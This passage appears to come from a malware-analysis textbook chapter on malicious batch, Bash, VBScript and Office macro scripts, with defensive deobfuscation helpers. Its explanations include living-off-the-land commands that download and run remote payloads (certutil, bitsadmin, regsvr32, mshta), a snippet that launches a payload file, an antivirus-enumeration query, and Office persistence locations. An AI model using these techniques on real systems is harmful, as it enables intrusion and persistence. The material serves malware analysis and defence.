10

Scripts and Macros – Reversing, Deobfuscation, and Debugging

Writing malware nowadays is a business, and, like any business, it aims to be as profitable as possible by reducing development and operational costs. Another strong advantage is being able to adapt quickly to changing requirements and environments. Modern systems are becoming more and more diverse, and low-level malware has to be more tailored to its task. For basic operations, such as the actual payload delivery, attackers therefore tend to choose approaches that work on multiple platforms and require minimal effort to develop and upgrade. As a result, it is no surprise that scripting languages have become increasingly popular among attackers, as many of them satisfy both of these criteria.

In addition, the traditional attacker requirements still apply, such as being as stealthy as possible to successfully achieve malicious goals. Scripts help here too: if the script interpreter is already available on the target system, the malicious code itself can be relatively small. Scripts also evade detection because many traditional antivirus engines handle binary and string signatures quite well, but properly detecting obfuscated scripts requires a syntax parser or an emulator, which might be costly for an antivirus company to develop and support. All of this makes scripts a perfect choice for first-stage modules.

In this chapter, we will cover the following topics:

  • Classic shell script languages
  • VBScript explained
  • VBA and Excel 4.0 (XLM) macros and more
  • The power of PowerShell
  • Handling JavaScript
  • Behind C&C – even malware has its own backend
  • Other script languages

Classic shell script languages

All modern operating systems support a command language of some kind, which is generally available through the shell. Their functionality varies from system to system. Some command languages are powerful enough to be used as full-fledged script languages, while others support only the minimal syntax required to interact with the machine. In this section, we will cover the two most common examples: bash scripting for Unix and Linux and batch files for the Windows platform.

Windows batch scripting

The Windows batch scripting language was created mainly to facilitate certain administrative tasks and not to completely replace other full-fledged alternatives. While it supports certain programming concepts, such as functions and loops, some quite basic operations, such as string manipulations, might be less obvious to implement compared to many other programming languages. The code can be executed directly from the cmd.exe console interface or by creating a file with the .cmd or .bat extensions. Note that the commands are case insensitive.

The list of supported commands remains quite limited, even today. All commands can be split into two groups, as follows:

  • Built-in: This set of commands provides the most fundamental functionality and is embedded into the interpreter itself. This means that the commands don’t have their own executable files. Some examples that might interest an attacker include the following:
    • call: This command executes functionality from the current batch file or another batch file, or executes a program
    • start: This command executes a program or opens a file according to its extension
    • cd: This command changes the current directory
    • dir: This command lists filesystem objects
    • copy: This command copies filesystem objects to a new location
    • move: This command moves filesystem objects to another location
    • del/erase: These commands delete existing files (not directories)
    • rd/rmdir: These commands delete directories (not files)
    • ren/rename: These commands change the names of the filesystem objects
  • External: These are tools that are provided as independent executable programs and can be found in a system directory. Some examples that are often misused by attackers include the following:
    • at: This schedules a program to execute at a certain time.
    • attrib: This displays or changes the filesystem object attributes; for example, the system, read-only, or hidden attributes.
    • cacls: This displays or changes the Access Control List (ACL).
    • find: This searches for particular filesystem objects; for example, by filename, by path, or by extension.
    • format: This formats a disk, potentially overwriting its previous content.
    • ipconfig: This displays and renews the network configuration for the local machine.
    • net: This is a multifunctional tool that supports various network operations, including user (net user) and remote resource (net use/net share) administration, service management (net start/net stop), and more.
    • ping: This tool checks connectivity to remote resources using ICMP packets. It can also be used to establish a covert network channel and exfiltrate data.
    • reg: This performs various registry-related operations, such as reg query, reg add, reg delete, and so on.
    • robocopy/xcopy: These tools copy filesystem objects to another location.
    • rundll32: This loads a DLL and calls one of its exported functions; exports can be referenced either by name or by ordinal.
    • sc: This communicates with the Service Control Manager and manages Windows services, including creating, starting, stopping, and reconfiguring them.
    • schtasks: This is a more powerful alternative to the at tool that schedules programs to start at a particular time. It is essentially a console version of Windows Task Scheduler and supports both local and remote machines.
    • shutdown: This restarts or shuts down the local or remote machine.
    • taskkill: This terminates processes by either name or PID; additionally, it supports both local and remote machines.
    • tasklist: This displays a list of currently running processes; additionally, it supports both local and remote machines.

Historically, no standard tools were provided to send HTTP requests (curl is now shipped with modern versions of Windows) or to compress files. From the attacker’s perspective, this meant that to implement even basic malware functionality, such as downloading, decrypting, and executing additional payloads, they had to write extra code. Only later did system tools such as bitsadmin and certutil become commonly misused by attackers to download and decode payloads. Here are some examples of how they were used:

  • bitsadmin /transfer <any_name> /download /priority normal <url> <dest>
  • certutil -urlcache -split -f <url> <dest>
  • certutil -decode <src> <dest>
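For triage, it can help to reproduce what certutil -decode does without running it on the analysis machine. The following Python sketch assumes the encoded file is plain base64, optionally wrapped in -----BEGIN ...----- and -----END ...----- marker lines like those certutil -encode writes; it is an approximation for offline analysis, not a reimplementation of certutil, and the function name is hypothetical:

```python
import base64


def certutil_style_decode(text: str) -> bytes:
    """Approximate `certutil -decode` for offline analysis.

    Assumes base64 content, optionally wrapped in PEM-style marker lines.
    """
    body = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("-----"):
            continue  # skip blank lines and the BEGIN/END marker lines
        body.append(line)
    return base64.b64decode("".join(body))


if __name__ == "__main__":
    blob = "-----BEGIN CERTIFICATE-----\nTVqQAAMAAAAEAAAA\n-----END CERTIFICATE-----\n"
    # The first two bytes of a decoded PE payload are the "MZ" signature
    print(certutil_style_decode(blob)[:2])
```

The marker lines must be removed before decoding because letters such as those in BEGIN and CERTIFICATE are valid base64 characters and would otherwise corrupt the output.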

In addition, there are a few lesser-known ways that Windows malware can access the remote payload using standard console commands, as follows:

  • regsvr32 /s /n /u /i:<url_to_sct> scrobj.dll
  • mshta <url_to_hta>
  • wmic os get /FORMAT:<url_to_xsl>

Finally, some standard tools, such as wmic, natively support remote machines, so if credentials are available, attackers can execute certain commands on another machine without any extra tools.

More non-standard security-related applications for standard tools can be found on the LOLBAS project page: https://lolbas-project.github.io/.

The most common obfuscation patterns for batch files are as follows:

  • Building commands by taking substrings from long blocks.
  • Using excessive variable replacements; here, many variables are either not defined or are defined somewhere far from their place of use.
  • Using long variable names of random uppercase and lowercase letters.
  • Adding multiple meaningless symbols such as pairs of double quotes or caret escape characters (^). An example can be seen in the following screenshot:
Figure 10.1 – An example of batch script obfuscation using escape symbols

  • Mixing uppercase and lowercase letters in general (the Windows console is case insensitive unless the case makes a difference; for example, in base64 encoding). Here is an example:
Figure 10.2 – An example of batch script obfuscation using non-existing variables

The first and second cases can be handled by simply printing the results of these operations with the echo command. The third and fourth cases can easily be handled with basic search-and-replace operations, while the fifth case can be handled by converting everything to lowercase, except for case-sensitive data such as base64-encoded text.
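These steps can be partially automated. The Python sketch below is a deliberately simplified model of cmd.exe expansion, assuming only plain %VAR% and %VAR:~start,length% references, simple set NAME=VALUE assignments, caret escapes, and empty quote pairs; it ignores delayed expansion (!VAR!), for loops, and script arguments, and all helper names are hypothetical:

```python
import re

# %NAME% or %NAME:~start[,length]% (simplified: no %1 arguments, no !delayed! expansion)
VAR_REF = re.compile(r"%([A-Za-z0-9_]+)(?::~(-?\d+)(?:,(-?\d+))?)?%")
SET_CMD = re.compile(r'\s*set\s+"?([A-Za-z0-9_]+)=(.*?)"?\s*$', re.IGNORECASE)


def batch_substring(value, start, length=None):
    """Mimic cmd.exe %VAR:~start,length% for the common cases."""
    if start < 0:
        start = max(len(value) + start, 0)  # a negative start counts from the end
    tail = value[start:]
    # A negative length drops characters from the end, as Python slicing does
    return tail if length is None else tail[:length]


def expand(line, env):
    def substitute(m):
        value = env.get(m.group(1).lower(), "")  # undefined variables expand to ""
        if m.group(2) is None:
            return value
        length = int(m.group(3)) if m.group(3) is not None else None
        return batch_substring(value, int(m.group(2)), length)
    return VAR_REF.sub(substitute, line)


def deobfuscate(script):
    env, out = {}, []
    for raw in script.splitlines():
        line = expand(raw, env)               # cmd.exe expands %...% first
        line = re.sub(r"\^(.)", r"\1", line)  # then a caret escapes the next character
        line = line.replace('""', "")         # heuristic: drop empty quote pairs
        m = SET_CMD.match(line)
        if m:
            env[m.group(1).lower()] = m.group(2)  # variable names are case insensitive
        out.append(line)
    return "\n".join(out)
```

For example, deobfuscating the two lines set xq=Cpowershellz and %xq:~1,10%%junk% -no""p -e^x^e^c bypass turns the second one into powershell -nop -exec bypass. Because the sketch only rewrites text and never executes anything, it is safe to run on untrusted samples; whatever it cannot resolve is left for manual analysis.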

Bash

Bash is a command-line interface that is native to the Unix world. It follows the one task, one tool paradigm, where multiple simple programs are chained together. Shell scripting supports fundamental programming blocks, such as loops, conditional constructs, and functions. In addition, it is powered by multiple external tools, most of which can be found on any supported system. Unlike the Windows console, where many everyday commands are built into the interpreter, many basic operations here, such as listing, copying, or deleting files, are performed by independent programs (ls, cp, and rm), although Bash still has a few builtins, such as cd and echo. The common file extension for shell scripts is .sh. However, even a file without any extension will be executed properly if the corresponding interpreter is specified in its first line; for example, #!/bin/bash. Unlike Windows, all commands here are case sensitive.

There are many other shells in the Linux world, such as sh or zsh, but their syntax is largely the same.

As most Linux tools provide only a tiny piece of functionality, a full-fledged attack will involve many of them. However, some are used by attackers more often than others, especially in mass-infection malware such as Mirai:

  • chmod: This changes permissions; for example, to make a file readable, writable, or executable.
  • cd: This changes the current directory.
  • cp: This copies filesystem objects to another location.
  • curl: This network tool is used to transfer data to and from remote servers through multiple supported protocols.
  • find: This searches for particular filesystem objects by name and certain attributes.
  • grep: This searches files for strings matching a pattern or lists the files that contain them.
  • ls: This lists filesystem objects.
  • mv: This moves filesystem objects.
  • nc: This is a netcat tool that allows the attacker to read from and write to network connections using TCP or UDP. By default, it is not available on some distributions.
  • ping: This checks the access to a remote system by sending ICMP packets.
  • ps: This lists processes.
  • rm: This deletes filesystem objects.
  • tar: This packs and unpacks archives, optionally compressing them with one of several supported algorithms.
  • tftp: This is a client for Trivial File Transfer Protocol (TFTP); it is a simpler version of FTP.
  • wget: This downloads files over the HTTP, HTTPS, and FTP protocols:
Figure 10.3 – An example of Mirai’s shell script

Just like malware written in any other programming language, shell scripts can incorporate obfuscation to slow down the reverse engineering process and bypass basic signature detection. Multiple approaches are possible in theory, such as dynamically decoding and executing commands, using meaningless variable names, or applying sed/awk string replacements. However, it is worth mentioning that modern IoT malware still rarely incorporates any sophisticated tricks. This is mainly because the scripts used are quite generic and often can only be reliably detected if the corresponding network IOC is known or if the final payload is detected.
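Because such droppers are mostly chains of download-and-run commands, pulling out the network indicators is often the quickest triage step. The following Python sketch assumes URLs appear verbatim in wget/curl commands and that tftp is invoked busybox-style with the server's IPv4 address as an argument; both regular expressions are illustrative heuristics rather than a complete shell parser, and the function name is hypothetical:

```python
import re

# Download URLs as they typically appear in wget/curl commands
URL_RE = re.compile(r"\b(?:https?|ftp)://[^\s;|&'\"]+")
# First IPv4 address following a tftp invocation, e.g. "tftp -g -r FILE HOST"
TFTP_RE = re.compile(r"\btftp\b[^;\n|&]*?\s(\d{1,3}(?:\.\d{1,3}){3})\b")


def extract_network_iocs(script):
    """Collect candidate network IOCs from a dropper-style shell script."""
    return {
        "urls": sorted(set(URL_RE.findall(script))),
        "tftp_hosts": sorted(set(TFTP_RE.findall(script))),
    }


if __name__ == "__main__":
    dropper = ("cd /tmp; wget http://192.0.2.10/bins/x.arm; chmod 777 x.arm; ./x.arm\n"
               "tftp -g -r x.mips 192.0.2.10")
    print(extract_network_iocs(dropper))
```

Obfuscated scripts that assemble URLs at runtime will slip past these patterns, so the output should be treated as a starting point rather than a complete list.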

That’s pretty much everything we need to know about shell scripts. Now, it’s time to talk about full-fledged programming languages. In particular, let’s start with Microsoft Visual Basic Scripting Edition (VBScript)-based threats.

VBScript explained

VBScript was the first mainstream programming language embedded into Windows OS. It has been actively used by system administrators to automate certain types of tasks without the need to install any third-party software. Available on all modern Microsoft systems, it gradually became a popular choice for malware writers who were looking for a guaranteed way of performing certain actions without any need to recompile the associated code.

At the time of writing, Microsoft has decided to switch to PowerShell to handle administrative tasks and has left all future VBScript support to the ASP.NET framework. So far, there are no plans to discontinue it in future Windows releases.

The native file extension for VBScript files is .vbs, but it is also possible to encode them into files using a .vbe extension. Additionally, they can be embedded into Windows script files (.wsf) or HTML application (.hta) files. .vbs, .vbe, and .wsf files can be executed either by wscript.exe, which provides the proper GUI, or cscript.exe, which is the console alternative. .hta files can be executed by the mshta.exe tool. VBScript code can also be executed directly from the command line using the mshta vbscript:<script_body> syntax.

Basic syntax

Initially, this technology was intended to be used by web developers, and this fact drastically affected the syntax. VBScript is modeled on Visual Basic and has similar programming elements, such as conditional structures, loop structures, objects, and built-in functions. Data types work slightly differently, though: VBScript has only one data type, Variant, which can hold different kinds of data depending on how it is used.

Most of the high-level functionality is accessed through the corresponding Microsoft Component Object Model (COM) objects. COM is a distributed system for creating and interacting with software components.

Here are some COM objects and the corresponding methods and properties that are often misused by attackers:

  • WScript.Shell: This gives access to multiple system-wide operations, as follows:
    • RegRead/RegDelete/RegWrite: These interact with the Windows registry to check the presence of certain software (such as an antivirus program), tamper with its functionality, delete traces of an activity, or add a module to autorun.
    • Run: This is used to run an application.
  • Shell.Application: This allows for more system-related functionality, as follows:
    • GetSystemInformation: This acquires various system information, for example, the size of the memory available to identify sandboxes
    • ServiceStart: This starts a service; for example, one that is associated with a persistent module
    • ServiceStop: This stops a service; for example, one that belongs to antivirus software
    • ShellExecute: This runs a script or an application
  • Scripting.FileSystemObject: This gives access to filesystem operations, as follows:
    • CreateTextFile/OpenTextFile: These create or open a file.
    • ReadLine/ReadAll: These read the content of a file; for example, a file that contains some information of interest or another encrypted module.
    • Write/WriteLine: These write to the opened file; for example, to overwrite an important file or configuration with other content, or to deliver the next attack stage or an obfuscated payload.
    • GetFile: This returns a File object that provides access to multiple file properties and several useful methods:
      • Copy/Move: These copy or move the file to the specified location
      • Delete: This deletes the corresponding file
      • Attributes: This property can be modified to change the file’s attributes
    • CopyFile/MoveFile: These copy or move a file to another location.
    • DeleteFile: This deletes the requested file.
  • Outlook.Application: This allows attackers to access Outlook applications to spread malware or spam:
    • GetNameSpace: Some namespaces, such as MAPI, will give attackers access to a victim’s contacts
    • CreateItem: This allows for a new email to be created
  • Microsoft.XMLHTTP/MSXML2.XMLHTTP: This allows attackers to send HTTP requests to interact with web applications:
    • Open: This creates a request, such as GET or POST
    • SetRequestHeader: This sets custom headers; for example, for victim statistics, an additional basic authentication layer, or even data exfiltration
    • Send: This sends the request
    • GetResponseHeader/GetAllResponseHeaders: These methods check the response for extra information or basic server validation
    • ResponseText/ResponseBody: These properties provide access to the actual response, such as a command or another malicious module
  • MSXML2.ServerXMLHTTP: This provides the same functionality as the previously mentioned XMLHTTP, but it is supposed to be used mainly from the server side. It is generally recommended because it handles redirects better.
  • WinHttp.WinHttpRequest: Again, this provides similar functionality, but it is implemented in a different library.
  • ADODB.Stream: This allows attackers to work with streams of various types, as follows:
    • Write: This writes to a stream object; this could be from the C&C response, for example
    • SaveToFile: This writes stream data to a file
    • Read/ReadText: These can be used to access the base64-encoded value
  • Microsoft.XMLDOM/MSXML.DOMDocument: These were originally designed to work with XML Document Object Model (DOM):
    • createElement: This can be used together with ADODB.Stream to decode base64: once the created element’s dataType is set to bin.base64, its nodeTypedValue property returns the decoded binary data

So, how can all this information be used when we’re performing an analysis? Here is a simple example of code executing another payload:

Dim Val
Set Val = WScript.CreateObject("WScript.Shell")
' Tripled quotes pass the path wrapped in double quotes, so paths with spaces still work
Val.Run """C:\Temp\evil.vbe"""

As you can see, once the object has been created, its methods can be called straight away. Among the built-in functions and statements, the following can be used to execute expressions and statements dynamically:

  • Eval: This evaluates an expression and returns a result value. It interprets the = operator as a comparison rather than an assignment.
  • Execute: This executes a group of statements separated by colons or line breaks in the local scope.
  • ExecuteGlobal: This is the same as Execute, but for the global scope. It is commonly used by attackers to execute decoded blocks.

Additionally, it is relatively straightforward to work with Windows Management Instrumentation (WMI) using VBScript. WMI is the infrastructure for managing data on Windows systems that gives access to various information, such as numerous system properties or a list of installed antivirus products. These are all potentially interesting to attackers.

Here are two ways it can be accessed:

  • With the help of the WbemScripting.SWbemLocator object and its ConnectServer method, which connects to a WMI namespace such as root\cimv2 (general system information) or root\SecurityCenter2 (installed security products):

    Set objLocator = CreateObject("WbemScripting.SWbemLocator")
    Set objService = objLocator.ConnectServer(".", "root\SecurityCenter2")
    objService.Security_.ImpersonationLevel = 3

    Set Jobs = objService.ExecQuery("SELECT * FROM AntiVirusProduct")

  • Through the winmgmts: moniker:

    strComputer = "."

    Set oWMI = GetObject("winmgmts:\\" & strComputer & "\root\SecurityCenter2")

    Set colItems = oWMI.ExecQuery("SELECT * from AntiVirusProduct")

Now, let’s talk about what tools we can use to facilitate the analysis.

Static and dynamic analysis

The once-supported Microsoft Script Debugger was replaced by Microsoft Script Editor, which was distributed as part of MS Office up to its 2007 edition and was later discontinued as well:

Figure 10.4 – The Microsoft Script Editor interface

For basic static analysis, a generic text editor that supports syntax highlighting might be good enough. For dynamic analysis, Visual Studio is highly recommended; even the free Community edition provides all the functionality needed to do this efficiently. To start debugging, you may first want to execute the script as follows:

cscript.exe //X evilscript.vbs

However, in most cases, this won’t work straight away: first, you need to make sure your IDE is registered as a JIT debugger. For Visual Studio, go to Tools | Options... | Debugging | Just-In-Time and make sure the Script checkbox is selected:

Figure 10.5 – Registering Visual Studio as the JIT debugger for VBScript

After this, executing the aforementioned cscript command will prompt you to use Visual Studio for debugging:

Figure 10.6 – cscript suggesting Visual Studio for VBScript debugging

Once confirmed, everything is ready for you to start dynamic analysis:

Figure 10.7 – Debugging the VBScript file in Visual Studio

While it is relatively straightforward to encode a .vbs file into .vbe using the EncodeScriptFile method provided by the Scripting.Encoder object, there is no native tool to decode .vbe scripts back to .vbs, since that would defeat the purpose of encoding:

Figure 10.8 – The original and encoded VBScript files

However, there are several open source projects available that aim to solve this problem; for example, the decode-vbe.py tool by Didier Stevens.

When analyzing the code, it makes sense to pay particular attention to the following operations:

  • Filesystem and registry access
  • Interaction with remote servers
  • Application and script execution
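A quick way to get an overview of these operations is to list the COM objects a script instantiates. The following Python sketch maps several of the ProgIDs listed earlier in this section to rough behavior categories; the category labels and the function name are hypothetical, and objects created indirectly (for example, from decoded strings) will be missed until the script is deobfuscated:

```python
import re

# Hypothetical mapping from ProgIDs (lowercase, version suffix removed) to behavior
PROGID_CATEGORIES = {
    "wscript.shell": "execution/registry",
    "shell.application": "execution/services",
    "scripting.filesystemobject": "filesystem",
    "adodb.stream": "filesystem",
    "microsoft.xmlhttp": "network",
    "msxml2.xmlhttp": "network",
    "msxml2.serverxmlhttp": "network",
    "winhttp.winhttprequest": "network",
    "outlook.application": "spreading",
}

CREATE_OBJECT = re.compile(r'\b(?:CreateObject|GetObject)\(\s*"([^"]+)"', re.IGNORECASE)


def triage_vbscript(source):
    """Return {ProgID: category} for every literal CreateObject/GetObject argument."""
    findings = {}
    for progid in CREATE_OBJECT.findall(source):
        # Strip a version suffix such as ".6.0" or ".5.1" before the lookup
        key = re.sub(r"(\.\d+)+$", "", progid).lower()
        findings[progid] = PROGID_CATEGORIES.get(key, "unknown")
    return findings
```

Anything reported as unknown, such as a winmgmts: moniker passed to GetObject, still deserves a manual look.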

Finally, let’s talk about obfuscation and how to handle it.

Deobfuscation

Quite often, VBS obfuscation utilizes pretty basic techniques, such as adding garbage comments or using strings that require character replacement before they can be used. Syntax highlighting appears to be quite useful when analyzing such files.

Another common example is building a second-stage payload from the embedded data, such as from an array of integers, and then executing it dynamically, as shown in the following screenshot:

Figure 10.9 – VBScript malware dynamically builds a second-stage payload

One of the easiest ways to convert it into the actual code is to use a great online tool called CyberChef:

Figure 10.10 – The second stage of the VBScript malware after decoding

Once you have the actual functional code, the easiest way to handle it is to search for the functions you are most interested in (the ones listed previously) and check their parameters to get information about dropped or exfiltrated files, executed commands, accessed registry keys, and the C&C servers it connects to. If the obfuscation layer makes the functionality completely obscure, then it is necessary to keep track of the variables in which the next-stage script is accumulated. You can iterate through the layers one by one, printing or watching them to get the next block’s functionality until the main block of code becomes readable.
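The integer-array and Chr() patterns described above can also be decoded with a few lines of Python instead of CyberChef. This is a sketch: it assumes decimal character codes, the function names are hypothetical, and the optional offset parameter is a hypothetical stand-in for whatever simple arithmetic a given sample applies, which must be confirmed by reading the code:

```python
import re

# Chr(n) / ChrW(n) calls joined with &, e.g. Chr(72) & Chr(105)
CHR_CHAIN = re.compile(r"\bChrW?\(\s*\d+\s*\)(?:\s*&\s*ChrW?\(\s*\d+\s*\))*", re.IGNORECASE)
# Integer arrays such as Array(87, 83, 99)
INT_ARRAY = re.compile(r"\bArray\(\s*(\d+(?:\s*,\s*\d+)*)\s*\)", re.IGNORECASE)


def fold_chr_chains(source):
    """Replace each Chr() chain with the equivalent VBScript string literal."""
    def to_literal(m):
        text = "".join(chr(int(n)) for n in re.findall(r"\d+", m.group(0)))
        return '"' + text.replace('"', '""') + '"'  # VBScript escapes " as ""
    return CHR_CHAIN.sub(to_literal, source)


def decode_int_arrays(source, offset=0):
    """Decode every Array(...) of integers, subtracting a hypothetical constant offset."""
    return ["".join(chr(int(n) - offset) for n in m.group(1).split(","))
            for m in INT_ARRAY.finditer(source)]
```

For example, fold_chr_chains turns x = Chr(72) & chr(105) into x = "Hi", which keeps the surrounding code intact so that the next layer can be read in place.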

Now that we’ve learned about VBScript, let’s talk about a slightly different topic – macros and the threats that rely on them.

VBA and Excel 4.0 (XLM) macros and more

While many high-profile malware attacks were related to exploited vulnerabilities, humans remain the weakest link in the defense chain. Social engineering techniques can allow malicious actors to successfully execute their code without creating or buying complicated exploits.

Since many organizations now provide cybersecurity training for all newcomers, many people know basic things, such as that it is unsafe to click on links or executable files received by various means from outside of the organization or the group of people that you know. Therefore, the attackers have to invent new ways to trick users, and documents containing malicious macros are a great example of these ongoing efforts.

VBA macros

MS Office macros are written in the Visual Basic for Applications (VBA) programming language, which is derived from Visual Basic 6, discontinued a long time ago. VBA survived and was later upgraded to version 7. Normally, the code can only run within a host application; VBA is built into most Microsoft Office applications (even on macOS).

Basic syntax

VBA is a dialect of Visual Basic and inherits its syntax. VBScript can be considered a subset of VBA with a few simplifications, mainly caused by the different application models. When analyzing VBA code, the same elements deserve attention:

  • File and registry operations
  • Network activity
  • Executed commands

The COM objects of interest to attackers are also the same as for VBScript. The only difference is that some functionality can be accessed without creating objects; for example, through the Shell function.

To ensure that it is executed automatically, malware must use one of the standard procedure names that define when this should happen. These names differ slightly between MS Office products. Here are the most commonly misused ones:

  • AutoOpen/Auto_Open
  • AutoExit/Auto_Close
  • AutoExec
  • Document_Open/Workbook_Open

Here is an example of Document_Open being used for this purpose:

Figure 10.11 – A malicious VBA macro registering the Document_Open routine to achieve execution

Malware can also install dedicated handlers so that it is executed later under certain conditions; for example, using Application.OnSheetActivate.
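To quickly spot these entry points, along with a few calls worth a closer look, extracted VBA code can be scanned with simple regular expressions. The following Python sketch is only a rough triage aid, not a replacement for olevba: the watch list and the function name are hypothetical, and plain pattern matching will also hit strings and comments:

```python
import re

# Entry points from the list above; VBA identifiers are case insensitive
AUTORUN_NAMES = ["AutoOpen", "Auto_Open", "AutoExit", "Auto_Close", "AutoExec",
                 "Document_Open", "Workbook_Open"]
# A deliberately short, hypothetical watch list of calls worth a closer look
SUSPICIOUS = ["Shell", "CreateObject", "GetObject", "CallByName", "Environ"]
SUSPICIOUS_RE = re.compile(r"\b(?:" + "|".join(SUSPICIOUS) + r")\b", re.IGNORECASE)


def triage_vba(code):
    """Report autorun procedures declared in the code and suspicious calls it contains."""
    autorun = [name for name in AUTORUN_NAMES
               if re.search(r"\bSub\s+" + re.escape(name) + r"\s*\(", code, re.IGNORECASE)]
    calls = sorted({m.group(0).lower() for m in SUSPICIOUS_RE.finditer(code)})
    return {"autorun": autorun, "calls": calls}
```

A non-empty autorun list combined with execution-related calls is a strong hint to prioritize the sample for manual analysis.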

MS Office has its own auto-start directories, and malware commonly places its code there to achieve persistence. Here are the standard ones for different products and versions:

  • %APPDATA%\Microsoft\Word\STARTUP
  • C:\Program Files\Microsoft Office\[root\]<Office1x>\STARTUP
  • %APPDATA%\Microsoft\Excel\XLSTART
  • C:\Program Files\Microsoft Office\[root\]<Office1x>\XLSTART

Apart from that, persistence can be achieved by manipulating global macro files:

  • Normal.dot/.dotm: The global macro template for Word (in %APPDATA%\Microsoft\Templates)
  • Personal.xls/.xlsb: The global macro workbook for Excel (in XLSTART)

Now, let’s talk about what tools can help us analyze malicious macros.

Static and dynamic analysis

Unlike VBScript, VBA has a native editor in MS Office that can be accessed from the Developer tab, which is hidden by default. It can be enabled in Word Options in the Customize Ribbon menu:

Figure 10.12 – Enabling the VBA macro editor in MS Office options

The editor also supports debugging, which makes both static and dynamic analysis relatively straightforward.

Another tool that can extract macros from documents is OfficeMalScanner, when executed with the info command-line argument. Apart from this, the previously mentioned tools from the oletools project (especially olevba) and oledump can be used to extract and analyze VBA macros as well. If the engineer wants to work with p-code instead of source code for some reason, the pcodedmp project aims to provide the required functionality.

Finally, ViperMonkey can be used to emulate some VBA macros and, in this way, help handle obfuscation.

Excel 4.0 (XLM) macros

XLM macros, also known as macro formulas, are a 30-year-old feature of Microsoft Excel that has recently gained popularity among attackers. They look like regular formulas, such as the SUM function, which is commonly used to calculate the sum of numbers spread across multiple cells. While some of them, such as EXEC, which allows arbitrary command execution, are dangerous out of the box, in most cases, attackers chain many benign ones to implement malicious functionality.

Basic syntax

Here are some examples of commonly misused formulas in the final deobfuscated payload:

  • Conditions: IF(logical_test, value_if_true, value_if_false)
  • Searching: SEARCH(find_text, within_text, start_num)
  • Calling WinAPIs directly: CALL(dll_name, api_name, format, arg0, …)

REGISTER is another formula that provides functionality similar to CALL.

An obvious example of a simple malicious payload utilizing them would be calling APIs such as URLDownloadToFile and ShellExecuteA to deliver and execute the next stage of the payload.

In reality, however, pretty much all modern malicious macros are obfuscated and use a different set of formulas to build the actual malicious functionality; we will cover them shortly. For .xls documents following the Compound File Binary (CFB) structure (more information can be found in Chapter 8, Handling Exploits and Shellcode), the workbook data is stored in the Binary Interchange File Format (BIFF8). Microsoft Excel doesn’t provide full functionality to edit it, so malware analysts may need dedicated tools to revert some of the changes that attackers make to hide the content. For OOXML-based .xlsb and .xlsm Excel documents, the corresponding data can generally be found in the xl\macrosheets directory, in BIFF12 and XML formats, respectively.
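Since OOXML documents are ZIP packages, the macro sheet parts can be listed without opening Excel. This Python sketch assumes the conventional xl/macrosheets/ location inside the package; part names are only a convention, so the workbook's relationship files remain the authoritative source if nothing is found. The function name is hypothetical:

```python
import zipfile


def list_macrosheets(path):
    """Return the macro sheet parts stored inside an OOXML (.xlsm/.xlsb) package.

    `path` can be a filename or a binary file-like object.
    """
    with zipfile.ZipFile(path) as package:
        return [name for name in package.namelist()
                if name.lower().startswith("xl/macrosheets/")]
```

The returned parts can then be read with ZipFile.read for manual review or passed to the dedicated tools described in this section.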

Finally, just like VBA macros, formulas can rely on special standard names to achieve autorun capabilities. An example would be a cell whose defined name starts with the Auto_Open prefix:

Figure 10.13 – The cell with the XLM macro that will be automatically executed

Now, let’s talk about how XLM-based payloads can be obfuscated.

Obfuscation

There are multiple ways attackers may attempt to complicate the work of reverse engineers trying to figure out malware’s purpose. Let’s explore the most common of them:

  • Using a white font on a white background and scattered formulas to make them invisible when the document is opened.
  • Using the RUN and GOTO formulas to complicate the control flow by jumping from one cell to another.
  • Using the CHAR command to resolve string characters dynamically and MID to get substrings.
  • Moving or accumulating the content around the sheet using the FORMULA command or modifying it using a combination of the GET.CELL and SET.VALUE commands.
  • Storing malicious formulas in hidden sheets. There are two types, and each should be handled differently:
    • hidden: Right-click any visible sheet tab, select Unhide…, and then select all hidden sheets:
Figure 10.14 – Unhiding hidden sheets in Excel

    • veryhidden: Change the hsState field from 2 to 0 in the corresponding BoundSheet record of the BIFF8 data (this requires dedicated tools such as OffVis):
Figure 10.15 – Changing the hsState field associated with a veryhidden sheet

  • Using hidden names. To reveal them, clear the fHidden bit in the corresponding LBL record:
Figure 10.16 – Changing the fHidden field to unhide the associated name

  • Using GET.WORKSPACE with different arguments to detect sandboxes, such as the following:
    • 13/14: Workspace width/height
    • 19: Mouse availability
    • 31: Whether the macro is currently running in single-step mode
    • 42: Audio availability
  • Executing the payload only on a particular day to tamper with behavioral analysis
  • Checking font size and row height or if the window has been maximized to detect tampering
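Constant CHAR, MID, and & expressions like those described above can be folded back into readable strings before the formulas are analyzed further. The following Python sketch assumes the arguments are literals and the helper names are hypothetical; real samples usually reference other cells (for example, CHAR(R1C1)), which requires emulation of the kind XLMMacroDeobfuscator performs:

```python
import re

CHAR_CALL = re.compile(r"\bCHAR\(\s*(\d+)\s*\)", re.IGNORECASE)
MID_CALL = re.compile(r'\bMID\(\s*"((?:[^"]|"")*)"\s*,\s*(\d+)\s*,\s*(\d+)\s*\)', re.IGNORECASE)
CONCAT = re.compile(r'"((?:[^"]|"")*)"\s*&\s*"((?:[^"]|"")*)"')


def quote(text):
    return '"' + text.replace('"', '""') + '"'  # Excel escapes " as ""


def mid(m):
    text = m.group(1).replace('""', '"')
    start, count = int(m.group(2)), int(m.group(3))
    if start < 1:
        return m.group(0)  # Excel returns #VALUE! here, so leave it untouched
    return quote(text[start - 1:start - 1 + count])  # MID uses 1-based positions


def fold_formula(formula):
    """Fold constant CHAR/MID/& expressions until the formula stops changing."""
    previous = None
    while previous != formula:
        previous = formula
        formula = CHAR_CALL.sub(lambda m: quote(chr(int(m.group(1)))), formula)
        formula = MID_CALL.sub(mid, formula)
        formula = CONCAT.sub(lambda m: '"' + m.group(1) + m.group(2) + '"', formula)
    return formula
```

For example, =EXEC(CHAR(99)&CHAR(97)&CHAR(108)&CHAR(99)) folds to =EXEC("calc"). Looping until nothing changes lets the three rewrites feed each other, so a MID over a freshly concatenated literal is also resolved.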

These are the most common obfuscation techniques. Finally, let’s see what tools can help us with the analysis.

Static and dynamic analysis

First of all, the already mentioned olevba tool can be used to automatically extract XLM macros as well. If another tool called XLMMacroDeobfuscator is also installed on the same system, the output of olevba will also be nicely deobfuscated:

Figure 10.17 – Extracted and deobfuscated chain of XLM macros

Apart from that, Microsoft Excel provides powerful built-in capabilities for debugging formulas. In particular, its Name Manager and macro debugger will be useful:

Figure 10.18 – Dynamic analysis of a chain of XLM macros using Excel’s debugger

Finally, the BiffView and OffVis tools can provide an intimate view of BIFF8 internals. OffVis can also help bypass some of the aforementioned obfuscation techniques that involve hiding sheets and names.
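
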